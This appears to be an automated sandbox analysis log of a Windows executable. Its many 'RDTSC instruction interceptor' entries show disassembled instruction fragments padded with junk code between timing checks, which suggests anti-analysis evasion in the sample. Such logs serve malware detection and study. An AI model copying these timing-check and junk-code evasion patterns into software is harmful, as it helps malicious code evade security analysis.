Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 743665 second address: 743676 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F28C47EE2B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push esi 0x0000000c push edi 0x0000000d push edx 0x0000000e pop edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7B8BD3 second address: 7B8BE2 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F28C4758076h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7B9150 second address: 7B9154 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7B9154 second address: 7B915E instructions: 0x00000000 rdtsc 0x00000002 js 00007F28C4758076h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7B915E second address: 7B9199 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F28C47EE2C2h 0x0000000c pushad 0x0000000d popad 0x0000000e jmp 00007F28C47EE2C8h 0x00000013 popad 0x00000014 pop edx 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7B9199 second address: 7B919F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7B919F second address: 7B91A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7B91A3 second address: 7B91A7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7B91A7 second address: 7B91AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7BAE8D second address: 7BAE9A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jl 00007F28C4758076h 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7BAE9A second address: 7BAECA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F28C47EE2C1h 0x00000008 jnc 00007F28C47EE2B6h 0x0000000e jmp 00007F28C47EE2C4h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7C13AE second address: 7C13B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7C0354 second address: 7C0359 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7C0359 second address: 7C0366 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7C0366 second address: 7C0389 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F28C47EE2B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c js 00007F28C47EE2D1h 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F28C47EE2BDh 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7C0389 second address: 7C038D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7C1065 second address: 7C107E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F28C47EE2BEh 0x00000009 pop esi 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7C107E second address: 7C1082 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7C1082 second address: 7C1093 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push esi 0x00000008 pushad 0x00000009 jnc 00007F28C47EE2B6h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7C1093 second address: 7C1099 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7C5A87 second address: 7C5A92 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jne 00007F28C47EE2B6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 789AEF second address: 789B12 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 mov dword ptr [esp], eax 0x0000000a add dword ptr [ebp+122D25E0h], ebx 0x00000010 lea eax, dword ptr [ebp+1247D8A7h] 0x00000016 sub dword ptr [ebp+122D194Fh], ebx 0x0000001c nop 0x0000001d push eax 0x0000001e push edx 0x0000001f push ebx 0x00000020 push ebx 0x00000021 pop ebx 0x00000022 pop ebx 0x00000023 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 789B12 second address: 789B18 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 78A02C second address: 5DF807 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 nop 0x00000007 sub dword ptr [ebp+1244E86Dh], ebx 0x0000000d push dword ptr [ebp+122D0C41h] 0x00000013 mov dword ptr [ebp+122D186Eh], edx 0x00000019 call dword ptr [ebp+122D35E5h] 0x0000001f pushad 0x00000020 pushad 0x00000021 jmp 00007F28C4758089h 0x00000026 mov bx, di 0x00000029 popad 0x0000002a clc 0x0000002b xor eax, eax 0x0000002d cmc 0x0000002e mov edx, dword ptr [esp+28h] 0x00000032 mov dword ptr [ebp+122D2E76h], eax 0x00000038 mov dword ptr [ebp+122D27C6h], eax 0x0000003e stc 0x0000003f mov esi, 0000003Ch 0x00000044 jnl 00007F28C475808Dh 0x0000004a add esi, dword ptr [esp+24h] 0x0000004e pushad 0x0000004f sub bh, 00000056h 0x00000052 sub dword ptr [ebp+122D2E76h], ebx 0x00000058 popad 0x00000059 lodsw 0x0000005b mov dword ptr [ebp+122D2E76h], ecx 0x00000061 add eax, dword ptr [esp+24h] 0x00000065 clc 0x00000066 mov ebx, dword ptr [esp+24h] 0x0000006a jmp 00007F28C4758085h 0x0000006f nop 0x00000070 pushad 0x00000071 push eax 0x00000072 push edx 0x00000073 jmp 00007F28C4758080h 0x00000078 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 78A099 second address: 78A09E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 78A09E second address: 78A0A8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jl 00007F28C4758076h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 78A0A8 second address: 78A0B9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e push ebx 0x0000000f pop ebx 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 78A0B9 second address: 78A0C3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnp 00007F28C4758076h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 78A0C3 second address: 78A0C7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 78A0C7 second address: 78A0D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esp+04h] 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push ebx 0x00000010 pop ebx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 78A0D8 second address: 78A0FB instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 mov eax, dword ptr [eax] 0x00000009 pushad 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d jmp 00007F28C47EE2C2h 0x00000012 popad 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 78A282 second address: 78A2A1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F28C4758085h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 78A2A1 second address: 78A2A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 78A7F2 second address: 78A7F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 78ACBA second address: 78ACBE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 78ACBE second address: 78ACD0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F28C475807Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 78ACD0 second address: 78AD1B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 popad 0x00000006 nop 0x00000007 push 00000000h 0x00000009 push esi 0x0000000a call 00007F28C47EE2B8h 0x0000000f pop esi 0x00000010 mov dword ptr [esp+04h], esi 0x00000014 add dword ptr [esp+04h], 0000001Ah 0x0000001c inc esi 0x0000001d push esi 0x0000001e ret 0x0000001f pop esi 0x00000020 ret 0x00000021 mov edi, dword ptr [ebp+122D2A32h] 0x00000027 lea eax, dword ptr [ebp+1247D8EBh] 0x0000002d sub cl, FFFFFFD2h 0x00000030 push eax 0x00000031 push eax 0x00000032 push edx 0x00000033 jmp 00007F28C47EE2C0h 0x00000038 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 78AD1B second address: 78AD4E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d jmp 00007F28C475807Fh 0x00000012 lea eax, dword ptr [ebp+1247D8A7h] 0x00000018 or edi, 771395A7h 0x0000001e push eax 0x0000001f push eax 0x00000020 push edx 0x00000021 push ebx 0x00000022 je 00007F28C4758076h 0x00000028 pop ebx 0x00000029 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 78AD4E second address: 78AD68 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F28C47EE2C6h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 78AD68 second address: 772A12 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b push 00000000h 0x0000000d push ecx 0x0000000e call 00007F28C4758078h 0x00000013 pop ecx 0x00000014 mov dword ptr [esp+04h], ecx 0x00000018 add dword ptr [esp+04h], 00000019h 0x00000020 inc ecx 0x00000021 push ecx 0x00000022 ret 0x00000023 pop ecx 0x00000024 ret 0x00000025 call dword ptr [ebp+1244C8B5h] 0x0000002b push eax 0x0000002c jne 00007F28C475808Ch 0x00000032 push eax 0x00000033 push edx 0x00000034 pushad 0x00000035 popad 0x00000036 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 772A12 second address: 772A16 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7C4E52 second address: 7C4E77 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F28C4758081h 0x00000007 push eax 0x00000008 push edx 0x00000009 push edx 0x0000000a pop edx 0x0000000b jmp 00007F28C475807Eh 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7C5326 second address: 7C5335 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 push edi 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7C55A3 second address: 7C55C5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007F28C4758081h 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e jns 00007F28C4758076h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7C55C5 second address: 7C55CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7CB79E second address: 7CB7BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F28C4758088h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7CA1B3 second address: 7CA1C9 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F28C47EE2BEh 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d pop eax 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7CA1C9 second address: 7CA1CD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7CA346 second address: 7CA34C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7CAC84 second address: 7CAC9E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F28C4758082h 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7CAC9E second address: 7CACF6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F28C47EE2C5h 0x00000009 popad 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d jmp 00007F28C47EE2C0h 0x00000012 jmp 00007F28C47EE2C5h 0x00000017 popad 0x00000018 popad 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e popad 0x0000001f jmp 00007F28C47EE2BEh 0x00000024 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7CACF6 second address: 7CAD1C instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F28C4758076h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push ebx 0x0000000d jmp 00007F28C4758086h 0x00000012 push edx 0x00000013 pop edx 0x00000014 pop ebx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7CAE95 second address: 7CAE9B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7CAE9B second address: 7CAEA3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7CAEA3 second address: 7CAEBD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F28C47EE2C5h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7CAEBD second address: 7CAED6 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pushad 0x00000004 popad 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push edx 0x0000000b jmp 00007F28C475807Dh 0x00000010 pop edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7CB62B second address: 7CB657 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push esi 0x00000006 jmp 00007F28C47EE2BFh 0x0000000b pop esi 0x0000000c jmp 00007F28C47EE2C3h 0x00000011 push eax 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7C9ED8 second address: 7C9EFB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jng 00007F28C475807Ah 0x0000000f jmp 00007F28C4758080h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7CFC18 second address: 7CFC1E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7CFC1E second address: 7CFC27 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7CFC27 second address: 7CFC2B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7D48ED second address: 7D48F3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7D7739 second address: 7D7741 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7D7741 second address: 7D7764 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push esi 0x00000006 jno 00007F28C4758076h 0x0000000c jmp 00007F28C4758086h 0x00000011 pop esi 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7D7764 second address: 7D7774 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F28C47EE2C2h 0x00000008 jnl 00007F28C47EE2B6h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7DB7BB second address: 7DB7C0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7DB7C0 second address: 7DB817 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F28C47EE2BEh 0x0000000b popad 0x0000000c jmp 00007F28C47EE2C6h 0x00000011 pop edx 0x00000012 pop eax 0x00000013 pushad 0x00000014 jmp 00007F28C47EE2C3h 0x00000019 jmp 00007F28C47EE2BCh 0x0000001e push eax 0x0000001f push edx 0x00000020 jp 00007F28C47EE2B6h 0x00000026 push eax 0x00000027 pop eax 0x00000028 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7DB817 second address: 7DB81B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7DEBBE second address: 7DEBC9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F28C47EE2B6h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7DEBC9 second address: 7DEBF3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F28C4758082h 0x00000008 jmp 00007F28C475807Ch 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 ja 00007F28C4758076h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7DEBF3 second address: 7DEBF9 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7DEF2A second address: 7DEF58 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F28C4758080h 0x00000008 pushad 0x00000009 popad 0x0000000a jmp 00007F28C475807Ch 0x0000000f push ecx 0x00000010 pop ecx 0x00000011 popad 0x00000012 jbe 00007F28C475807Eh 0x00000018 pushad 0x00000019 popad 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7DEF58 second address: 7DEF66 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7DF314 second address: 7DF318 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7DF318 second address: 7DF31E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7E1EF7 second address: 7E1F00 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 push esi 0x00000006 pop esi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7E205F second address: 7E2063 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7E8520 second address: 7E8526 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7E8526 second address: 7E852C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7E6F4B second address: 7E6F51 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7E6F51 second address: 7E6F5C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jc 00007F28C47EE2B6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7E6F5C second address: 7E6F62 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7E70A0 second address: 7E70A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7E725E second address: 7E7269 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7E7269 second address: 7E7270 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7E73CA second address: 7E73CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7E73CF second address: 7E73D5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7E73D5 second address: 7E73DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7E76F2 second address: 7E7703 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F28C47EE2B6h 0x0000000a jng 00007F28C47EE2B6h 0x00000010 popad 0x00000011 rdtsc
